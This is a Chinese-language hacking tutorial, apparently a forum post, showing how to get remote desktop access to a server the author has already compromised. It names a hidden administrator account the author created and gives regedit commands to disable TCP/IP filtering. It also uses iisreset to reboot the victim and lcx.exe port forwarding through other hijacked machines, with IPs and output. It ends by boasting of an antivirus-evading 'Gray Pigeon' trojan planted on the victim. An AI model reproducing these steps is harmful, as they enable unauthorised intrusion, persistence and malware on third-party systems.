權過程中,伺服器開了3389卻串連不上的處理:
大家好,我是黑白貿易(qq:396418270)
我們雖然取得了超級管理員權限,也開了3389連接埠,但卻串連不上!可能的原因:
1、可能設定了tcp/ip過濾
2、3389連接埠改了
3、內網原因
4、其他原因
下面看我這種情況!
我已經提權建立了超級使用者! fengyun$
看看能不能串連
用戶端無法串連到服務端
看看是否過濾了ip
第1種情況的解決辦法是通過修改註冊表方法如下:
我們要做的就是匯出他註冊表的三處,更改後再匯入就可以了,回到〖Ws cript.Shell〗執行cmd命令:
regedit -e c:/1.reg HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Services/Tcpip
匯出註冊表裡關於TCP/IP篩選的第一處
regedit -e c:/2.reg HKEY_LOCAL_MACHINE/SYSTEM/ControlSet002/Services/Tcpip
匯出註冊表裡關於TCP/IP篩選的第二處
regedit -e c:/3.reg HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip
#匯出註冊表裡關於TCP/IP篩選的第三處
把1.reg,2.reg,3.reg下載回來到自己的硬碟裡面編輯一下,把關於TCP/IP篩選的幾個地方改一下
首先開啟1.reg找到"EnableSecurityFilters"=dword:00000001把最後面的數字1改成0後儲存,
然後更改2.reg,3.reg,更改方法一樣,我就不再羅嗦了~
我查看了一下 1.reg 中的"EnableSecurityFilters"=dword:00000000 開來沒有設定tcp/ip 過濾
為了完整期間,我看看2和3 "EnableSecurityFilters"=dword:00000000
最後的數值都為0看來第1種情況也不滿足
如果滿足的話我們就按以下我說的去做!
然後我們把1.reg,2.reg,3.reg再上傳回對方的機器裡面(這裡我們要選上覆蓋模式,因為沒有權
限刪除原來的1.reg,2.reg,3.reg),上傳成功後再回到〖Ws cript.Shell〗執行cmd命令:
regedit -s c:/1.reg #安靜模式下把我們修改完的1.reg匯入到他的註冊表
regedit -s c:/2.reg #安靜模式下把我們修改完的2.reg匯入到他的註冊表
regedit -s c:/3.reg #安靜模式下把我們修改完的3.reg匯入到他的註冊表
OK!匯入後重新啟動他的機器後在能解決TCP/IP篩選問題,
再在〖Ws cript.Shell〗執行cmd命令iisreset /reboot /timeout:00"
#利用他自身的iis服務來重新啟動他的機器
第2種情況:用 終端連接埠-自動登入 查看一下 然後用ip:連接埠串連 例如:61.235.153.16:3457
第3種情況和第4種情況可以用lcx連接埠轉寄工具實現!
首先我們要先上傳lcx.exe 這裡我已經傳好了!
第一條和第三配合使用。如在本機上監聽 -listen 51 3389,在肉雞上運行-slave 本機ip 51 肉雞ip 3389
那麼在本地連127.0.1就可以連肉雞的3389.第二條是本機轉向。如-tran 51 127.0.0.1 3389 ==========
這是工具的用法:但需要一台外網機器
[Usage of Packet Transmit:]
c:/lcx.exe -<listen|tran|slave> <option> [-log logfile]
[option:]
-listen <ConnectPort> <TransmitPort>
-tran <ConnectPort> <TransmitHost> <TransmitPort>
-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>
這是我的ip Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.0.0.132
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.0.0.138
是內網,還的映射,所以我就用別的肉雞代替吧!218.58.79.21 就用這個吧!!
把我的lcx傳上去! 這台機器超過串連數了
我處理一下
看看能不能上去
好了進入,我們接著操作!!
首先在webshell 上我們執行這個命令
c:/lcx.exe -slave 218.58.79.21 550 127.0.0.1 3389
然後到218.58.79.21 裡面執行先面操作,
暈 沒反映!!
幸虧我還沒在webshell 上執行第一步!
換一個吧!!
不好意思還得把工具傳到上面去
好這次可以!!
需要把 218.58.79.21 改成 現在的 61.235.153.16
好現在 肉雞上的webshell 已經執行了
Listening port 550 ......
Listen OK!
Listening port 880 ......
Listen OK!
Waiting for Client on port:550 ......
Accept a Client on port 550 from 218.56.9
Waiting another Client on port:880....
執行成功 繼續看我操作
用系統本身帶的3389連接器串連,用別的不行!!
可能 61.235.153.16 有串連限制,現在我用自己的連一下吧
應該可以了
webshell 有問題,耽誤大家時間了, 我又實驗了一次,這次成功了,可能是 webshell 執行命令逾時了
我們去看看!
裝著瑞星殺毒軟體!!
2.4cpu 1G 記憶體 機器一般!!
看到我們匯出的註冊表了吧!!
1.exe是我免殺的鴿子!!
看看免殺不??殺記憶體!!怎麼樣沒被殺掉 吧!!
好了 教程就到這裡吧!!耽誤了大家不少時間!有問題的可聯絡我的QQ:396418270(
其實內網也可以實現這點的,這裡我就不示範了, 希望大家能學習到新的東西!!
88
在這裡感謝 給我提供這個webshell 的好友 不過我忘記是那位了,希望這位朋友聯絡我,我把這個伺服器換給他.over